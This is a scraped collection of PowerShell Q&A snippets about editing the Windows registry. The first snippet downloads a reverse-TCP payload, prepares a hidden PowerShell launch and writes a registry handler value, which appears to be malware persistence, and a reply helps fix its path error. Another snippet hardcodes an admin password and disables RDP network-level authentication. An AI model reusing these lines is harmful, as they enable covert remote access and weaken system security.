$PERprogram = $env:tmp+"\rev_tcp.exe" # Downloding the payload reverse tcp in temp folder
$dest = $env:tmp+"\rev_tcp"
$cmd = "powershell -WindowStyle Hidden " + $PERprogram
DownloadPayload 'rev_tcp' $dest -ErrorAction Continue;
Set-ItemProperty "HKCR:\.cpl\persistentHandler" -Name "sd" -Value -Force**
when i try to run the above script. I am getting the error as A drive with name HKCR does not exit. but i already created the drive with HKCR in powershell as New-PSDrive -PSProvider registry -Root HKEY_CLASSES_ROOT -Name HKCR.
You can use HKLM:\SOFTWARE\Classes instead of creating HKCR:.
Related
so i just start learn about powershell script
my objective is to uncheck this one
system properties
so i create powershell script to run the file.reg
this is my test1.ps1
$username = "desktop-2ussd\viola"
$password = "qwerty"
$AdminCred = New-Object System.Management.Automation.PSCredential -ArgumentList #($username,
(ConvertTo-SecureString -String $password -AsPlainText -Force))
$regFile = ".\file.reg"
$regArg1 = "import $regFile"
Start-Process reg.exe -ArgumentList $regArg1 -Credential $AdminCred
and this is my file.reg
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
"updateRDStatus"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"UserAuthentication"=dword:00000000
after that i run the script like this
powershell -ExecutionPolicy Bypass -File .\test1.ps1
there is no error output but the checkbox is still checked
please help me
Currently you wont recognize if something goes wrong as you do not get a return code. In case of start-process you would need to specify the parameters:
-wait
-passthru
to get the return code.
But you can directly write to the registry from PowerShell instead of using reg.exe. - e.g.:
set-itemproperty -path "HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server" -name fDenyTSConnections -value 0
The above mentioned registry change gets effective immediately without restarting the related service.
Based on your comment you missed to specify the computer where the command should run. Also make use of $using to access variables of the caller machine from the remote machine e.g.:
$code = {
$newValue = $using:value
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" -Name "UserAuthentication" -Value $newValue
}
$value = 0
invoke-command -computername [TargetComputerName] -credential $cred -scriptblock $code
In your example you did pass the value to the paramter -value as $args[0] - this only works if you specify the paramter -argumentlist of the invoke-command cmdlet. But I would advise to use $using as outlined in my example.
Powershell command showing false , even though that path exist in registry, what wrong i am doing?
PS D:\Folder> Test-Path -Path 'HKU:\S-9-9-21-57989841-616249376-1801674531-2451702'
False
Drive HKU: is not defined by default.
Either use:
Test-Path -Path 'Registry::HKEY_USERS\S-9-9-21-57989841-616249376-1801674531-2451702'
or define the drive first:
$null = New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS
Test-Path -Path 'HKU:\S-9-9-21-57989841-616249376-1801674531-2451702'
and when finished remove that drive with Remove-PSDrive -Name HKU
Is there a way to set the default wallpaper for a new user logging into windows 10? I was supplied with the script below but only works for the current user. Is this possible to set it for any user that logs in?
Function Set-WallPaper($Value)
{
Set-ItemProperty -path 'HKCU:\Control Panel\Desktop\' -name wallpaper -value $value
rundll32.exe user32.dll, UpdatePerUserSystemParameters
}
For some reason that registry entry doesn't work with new profiles in Windows 10. Some other setup process clobbers it. I've seen scripts where the default .jpg is made writeable and then replaced. http://ccmexec.com/2015/08/replacing-default-wallpaper-in-windows-10-using-scriptmdtsccm/
You can access all loaded user registry hives through the HKEY_USERS hive.
It's not automatically mounted like HKCU: or HKLM:, but you can access it with a provider-qualified path, like this:
Get-ChildItem -Path Registry::HKEY_USERS
I'd also suggest that you declare your parameters properly as well:
function Set-WallPaper
{
param(
[Parameter(Mandatory=$true)]
[System.IO.FileInfo]$WallPaperFile,
[Parameter(Mandatory=$false)]
[switch]$All
)
if($All){
foreach($UserHive in Get-ChildItem Registry::HKEY_USERS){
$DesktopKeyPath = (Join-Path $UserHive.PSPath "Control Panel\Desktop")
if(Test-Path $DesktopKeyPath){
Set-ItemProperty -Path $DesktopKeyPath -Name Wallpaper -Value $WallPaperFile.FullName
}
}
} else {
Set-ItemProperty -Path 'HKCU:\Control Panel\Desktop\' -Name wallpaper -Value $WallPaperFile.FullName
}
rundll32.exe user32.dll, UpdatePerUserSystemParameters
}
I'm getting confused while trying to automatically login to a share on my server through Powershell using PSCredentials.
Here is the code I'm currently using WITHOUT using PSCredentials...
#Login to server to copy installer files to desktop
Remove-PSDrive P
New-PSDrive -Name P -PSProvider FileSystem -Root \\192.168.1.85\Users2\Ross\Documents\Powershell -Credential Ross
#Copies installer files from server to the local desktop
Copy-Item -Path \\192.168.1.85\Users2\Ross\Documents\Powershell\ccsetup502.exe -Destination C:\Users\Ross\Desktop
#Executes copied installers
Start-Process C:\Users\Ross\Desktop\ccsetup502.exe -ArgumentList "/S" -Wait -Verb RunAs
#Deletes leftover installer files
Remove-Item C:\Users\Ross\Desktop\ccsetup502.exe
And here is the website I'm using to help, but whichever way I try and apply it to my own script, it never works?
http://geekswithblogs.net/Lance/archive/2007/02/16/106518.aspx
Thanks in advance!
Ross
Try this. It will prompt you for creds, but you could always create them and store them in a variable if you wish as well.
#Login to server to copy installer files to desktop
Remove-PSDrive P
New-PSDrive -Name P -PSProvider FileSystem -Root \\192.168.1.85\Users2\Ross\Documents\Powershell -Credential (Get-Credential)
#Copies installer files from server to the local desktop
Copy-Item -Path \\192.168.1.85\Users2\Ross\Documents\Powershell\ccsetup502.exe -Destination C:\Users\Ross\Desktop
#Executes copied installers
Start-Process C:\Users\Ross\Desktop\ccsetup502.exe -ArgumentList "/S" -Wait -Verb RunAs
#Deletes leftover installer files
Remove-Item C:\Users\Ross\Desktop\ccsetup502.exe
After some perseverance I managed to solve this...
Probably worth noting that I left the PSDrive removal in there for testing purposes, as you'll get an error if the script doesn't complete and you try to run it again after making changes.
#Ensure previous PSDrive 'p' is removed
Remove-PSDrive P
#Creates new PSDrive
New-PSDrive -Name P -PSProvider FileSystem -Root \\YOURSERVERNAMEHERE\YOURFILEPATHHERE
#Login to server
new-object -typename System.Management.Automation.PSCredential -argumentlist "YOURDOMAINORSERVERUSERNAMEHERE",$password
#Copies installer files from server to the local desktop
Copy-Item -Path \\YOURSERVERNAMEHERE\YOURFILEPATHHERE\ccsetup502.exe -Destination C:\YOURFILEPATHHERE
#Executes copied installers, runs the installer silently, waits until the installer has completed
Start-Process C:\YOURFILEPATHHERE\ccsetup502.exe -ArgumentList "/S" -Wait -Verb RunAs
#Deletes leftover installer files
Remove-Item C:\YOURFILEPATHHERE\ccsetup502.exe
Hopefully this helps someone else who is stuck in the future!
Thank you anyone else who contributed their efforts.
Is it possible to edit a registry key remotely with a Powershell script? If it is, how?
I have a list of 7 servers in which I have to disable windows update settings. I've coded the following script but only can be used localy:
$regkey = "HKLM:\SOFTWARE\microsoft\......\auto update"
set-itemproperty -path $regkey -name AUOptions -value 1
set-itemproperty -path $regkey -name ElevateNonAdmins -value 0
set-itemproperty -path $regkey -name IncludeRecommendedUpdates -value 0
Any suggestion? Thanks!
Powershell's support for remote registry is done via .Net. There are lots of Google answers available. Here's one from right this site:
$Reg = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine', $computer1)
$RegKey= $Reg.OpenSubKey("SOFTWARE\\Veritas\\NetBackup\\CurrentVersion")
As for how to set the values is left as an exercise to the reader.